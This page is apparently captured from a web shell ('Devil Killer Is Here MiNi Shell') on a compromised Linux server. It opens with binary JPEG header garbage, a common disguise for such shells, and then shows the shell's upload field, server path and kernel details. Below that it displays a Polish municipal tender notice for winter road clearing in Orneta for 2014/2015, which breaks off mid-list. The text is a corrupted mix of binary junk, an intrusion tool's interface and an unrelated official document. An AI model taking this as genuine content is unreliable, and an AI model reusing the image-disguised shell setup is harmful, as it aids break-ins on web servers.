JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140916/306952-N-2014.html

<p class="kh_header"><b>Orneta: Zimowe utrzymanie  dróg gminnych i wewnętrznych na terenie gminy Orneta (poza granicami  administracyjnymi  miasta Orneta) w sezonie zimowym 2014/2015</b><br>
<b>Numer ogłoszenia: 306952 - 2014; data zamieszczenia: 16.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orneta.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie  dróg gminnych i wewnętrznych na terenie gminy Orneta (poza granicami  administracyjnymi  miasta Orneta) w sezonie zimowym 2014/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zimowe utrzymanie dróg gminnych i wewnętrznych na terenie  gminy Orneta (poza  granicami administracyjnymi miasta  Orneta) w zakresie  odśnieżania i zwalczania śliskości w sezonie zimowym 2014/2015 .
2.Zakres przedmiotu zamówienia został podzielony na 4 części i obejmuje:  
1) Część 1-Rejon I obejmujący sołectwa:  Henrykowo, Nowy Dwór, Kumajmy, Wola Lipecka,  Mingajny, Miłkowo
Łączna długość dróg do zimowego utrzymania w zakresie odśnieżania : 54,0 km
Łączna długość dróg do zimowego utrzymania w zakresie zwalczania śliskości:4,0 km
2) Część 2- Rejon II obejmujący sołectwa: Karkajmy, Wojciechowo, Krosno, Opin, Biały Dwór,  Krzykały,  Karbowo
Łączna długość dróg do zimowego utrzymania w zakresie odśnieżania : 34,0 km
Łączna długość dróg do zimowego utrzymania w zakresie zwalczania śliskości::7,6 km
3) Część 3- Rejon III obejmujący sołectwa: Bażyny, Dąbrówka, Drwęczno,  Klusajny
Łączna długość dróg do zimowego utrzymania w zakresie odśnieżania : 23,0 km
4) Część 4- Rejon IV obejmujący sołectwa: Osetnik, Chwalęcin, Augustyny 
Łączna długość dróg do zimowego utrzymania w zakresie odśnieżania : 18,0 km
3.  Zamawiający dopuszcza możliwość składania ofert częściowych.       
Warunki składania ofert częściowych zostały określone w § 18 IDW Rozdziału I SIWZ 
Jeden Wykonawca może złożyć ofertę częściową maksymalnie tylko na jedną wybraną  przez Wykonawcę część  przedmiotu   zamówienia  tj na Część 1 lub  Część 2 lub Część 3 lub Część 4   przedmiotu zamówienia.
4.  Szczegółowy opis i zakres przedmiotu zamówienia został przedstawiony w Szczegółowym opisie przedmiotu zamówienia Rozdziału III SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp dla poszczególnych części przedmiotu zamówienia. Wielkość zamówienia uzupełniającego dla poszczególnych części przedmiotu zamówienia do 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca  wykaże, że:
a)  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy  w tym okresie wykonał należycie lub w przypadku  świadczeń okresowych lub ciągłych wykonuje  należycie co najmniej co najmniej 1 usługę (w ramach 1 umowy)  polegającą na zimowym utrzymaniu dróg/ulic w zakresie odśnieżania i/lub zwalczania śliskości,  która realizowana była  przez okres  co najmniej 5 miesięcy (jeżeli okres działalności jest krótszy to w tym okresie) i której  zrealizowana wartość  brutto wynosi co najmniej dla:
Części 1 - 30 000 zł. 
Części 2 - 30 000 zł
Części 3 -   5 000 zł
Części 4 -   5 000 zł
Ocena spełnienia warunku  nastąpi na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych  w  § 6 ust. 1 pkt 1 i 2 IDW tj 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ
-  wykazu wykonanych, a  w przypadku świadczeń okresowych lub ciągłych również  wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie, wraz z podaniem ich  przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane  sporządzonego wg załącznika nr 5 do IDW, oraz załączeniem dowodów, czy zostały  wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże , że 
dysponuje lub będzie dysponował potencjałem technicznym  tj. technicznie sprawnymi jednostkami sprzętowymi gwarantującymi efektywne prowadzenie akcji zimowej.
Wymagana minimalna ilość jednostek sprzętowych: 
dla Części 1: Rejon I przedmiotu zamówienia:
a) min. 1 piaskarka lub sprzęt równoważny
b) min. 3  pługi odśnieżne + min. 3 nośniki do pługów odśnieżnych (samochody ciężarowe, ciągniki) - odpowiedniej mocy i ładowności dostosowanej do  pługów lub sprzęt  równoważny
dla Części 2: Rejon II przedmiotu zamówienia
a) min. 1 piaskarka lub sprzęt równoważny
b) min. 3  pługi odśnieżne + min. 3 nośniki do pługów odśnieżnych (samochody ciężarowe, ciągniki) - odpowiedniej mocy i ładowności dostosowanej do  pługów lub sprzęt równoważny
dla Części 3: Rejon III przedmiotu zamówienia:
a) min. 2  pługi odśnieżne + min. 2 nośniki do pługów odśnieżnych (samochody ciężarowe, ciągniki) - odpowiedniej mocy i ładowności dostosowanej do  pługów lub sprzęt równoważny
dla Części 4: Rejon IV przedmiotu zamówienia:
a) min. 2  pługi odśnieżne + min. 2 nośniki do pługów odśnieżnych (samochody ciężarowe, ciągniki) - odpowiedniej mocy i ładowności dostosowanej do  pługów lub sprzęt  równoważny
Ocena spełnienia warunku nastąpi na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych w  § 6 ust. 1 pkt  1 i 3  IDW tj 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ
-  wykazu  narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami  sporządzonego wg załącznika nr 6 do IDW Rozdziału II SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca wskazuje w wykazie usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia opisanego w pkt III.3.2 niniejszego ogłoszenia;;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty sporządzony wg Załącznika nr 1 do IDW Rozdziału II SIWZ 
2) Kosztorys ofertowy sporządzony wg Załącznika nr 2 do IDW Rozdziału II SIWZ 
3) Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru, a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego ( jeżeli dana sytuacja dotyczy wykonawcy) 
4)Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom według załącznika nr 7 do IDW Rozdziału II SIWZ 
5)Zastrzeżenie informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji sporządzone wg załącznika nr 8 do IDW Rozdziału II SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość dokonania czynności prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku  do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2.Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian  zawartej umowy:  
1) konieczność skrócenia terminu umownego zakończenia przedmiotu Umowy  w przypadku nie zabezpieczenia w budżecie gminy środków finansowych na realizację przedmiotu    Umowy w  roku w budżetowym 2015, bez prawa Wykonawcy do dochodzenia z tego tytułu   jakichkolwiek roszczeń. Powyższa zmiana (skrócenie) terminu  zakończenia realizacji  przedmiotu Umowy  nie  spowoduje żadnych sankcji finansowych dla Zamawiającego z tytułu wcześniejszego rozwiązania umowy na realizację  przedmiotu Umowy
2) konieczność wydłużenia terminu zakończenia przedmiotu Umowy w  przypadku  wystąpienia warunków zimowych po terminie określonym w § 2 ust. 1 Projektu Umowy Rozdziału IV  SIWZ,  bez prawa Wykonawcy do dochodzenia z tego tytułu   jakichkolwiek roszczeń. Powyższa zmiana (wydłużenie) terminu zakończenia realizacji przedmiotu Umowy  nie  spowoduje zmiany cen jednostkowych netto określonych w § 7 ust. 2  Projektu Umowy  Rozdziału IV SIWZ oraz żadnych innych sankcji finansowych dla Zamawiającego z tytułu wydłużenia terminu zakończenia realizacji  przedmiotu Umowy.
3) zmianę ilościowego zakresu rzeczowego  przedmiotu Umowy  w przypadku:
a) zmiany długości odśnieżanych i posypywanych dróg np. w związku ze  zmianą kategorii dróg, z remontem, przebudową, rozbudową  budową dróg przeznaczonych do zimowego utrzymania i związanych z tym wyłączeń z utrzymania zimowego lub włączeń  do utrzymania zimowego itp,  
b) mniejszej/większej ilości zakresu rzeczowego faktycznie realizowanego 
c) podjęcia przez zamawiającego decyzji o realizacji części  zakresu rzeczowego przedmiotu Umowy   sposobem  gospodarczym 
d) braku środków finansowych na realizację całego  zakresu przedmiotu Umowy            
e) zmiany liczby działań spowodowanej warunkami  atmosferycznymi.
Powyższa zmiana ilościowego zakresu rzeczowego przedmiotu Umowy nie  spowoduje zmiany cen jednostkowych netto określonych w § 7 ust. 2  Projektu Umowy Rozdziału IV SIWZ oraz żadnych innych sankcji finansowych dla Zamawiającego z tytułu zmiany  ilościowego  zakresu rzeczowego przedmiotu Umowy.
4) zmianę wynagrodzenia wykonawcy w przypadku:
a) zmiany ilościowego zakresu rzeczowego  przedmiotu  Umowy o  którym  mowa  w ust. 7 pkt  2 ppkt. 3) niniejszego paragrafu 
b) zmiany stawki podatku VAT 
5) wprowadzenia zmian w stosunku do Szczegółowego Opisu Przedmiotu Zamówienia Rozdziału III SIWZ w zakresie wykonania usług nie wykraczających poza zakres przedmiotu Umowy, w sytuacji konieczności zwiększenia usprawnienia procesu realizacji zamówienia,
6) zmianę w zatrudnieniu podwykonawców w przypadku, gdy Wykonawca oświadczył, iż wykona umowę osobiście w zakresie zgodnym ze SIWZ oraz zmiany osobowej podwykonawców oraz zakresu podwykonawstwa, 
7)oznaczenie stron umowy, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo 
zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem czynności powodujących taką zmianę.
8) powstanie rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie  będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony; 
9) konieczność wprowadzenia  zmian  wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a są one korzystne dla zamawiającego          
3. Niezależnie od powyższych zmian, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych stron ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu Umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie przedmiotu Umowy. W takiej sytuacji, Zamawiający i Wykonawca wprowadzą do Umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe jego brzmienie bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu Umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> orneta-umig.bip-um.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Stanowisko d/s Zamówień publicznych (kam.A- parter)...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.09.2014 godzina 11:00, miejsce: Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Sekretariat pok. nr 3....</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rejon I obejmujący sołectwa: Henrykowo, Nowy Dwór, Kumajmy, Wola Lipecka, Mingajny, Miłkowo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres przedmiotu zamówienia obejmuje: 
1)odśnieżanie dróg gminnych i wewnętrznych na terenie sołectwa 
a)Henrykowo- 17,0 km 
b)Nowy Dwór- 6,0 km 
c)Kumajny- 5,0 km 
d)Wola Lipecka- 2,0 km 
e)Mingajny- 19,0 km 
f)Miłkowo - 5,0 km 
Łączna długość dróg do zimowego utrzymania w zakresie odśnieżania : 54,0 km 
2)zwalczanie śliskości dróg gminnych i wewnętrznych na terenie sołectwa 
a)droga do wsi Wola Lipecka + wewn. - 2,0 km 
b)droga we wsi Henrykowo- 2,0 km 
Łączna długość dróg do zimowego utrzymania w zakresie zwalczania śliskości: 4,0 km 
2.Szczegółowy opis i zakres przedmiotu zamówienia przedstawiony został w Szczegółowym opisie przedmiotu zamówienia Rozdziału III SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rejon II obejmujący sołectwa: Karkajmy, Wojciechowo, Krosno, Opin, Biały Dwór, Krzykały, Karbowo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres przedmiotu zamówienia obejmuje: 
1)odśnieżanie dróg gminnych i wewnętrznych na terenie sołectwa 
a)Karkajmy- 5,0 km 
b)Wojciechowo- 3,0 km 
c)Krosno- 9,0 km 
d)Opin- 8,0 km 
e)Biały Dwór- 4,0 km 
f)Krzykały- 4,0 km 
g)Karbowo- 1,0 km 
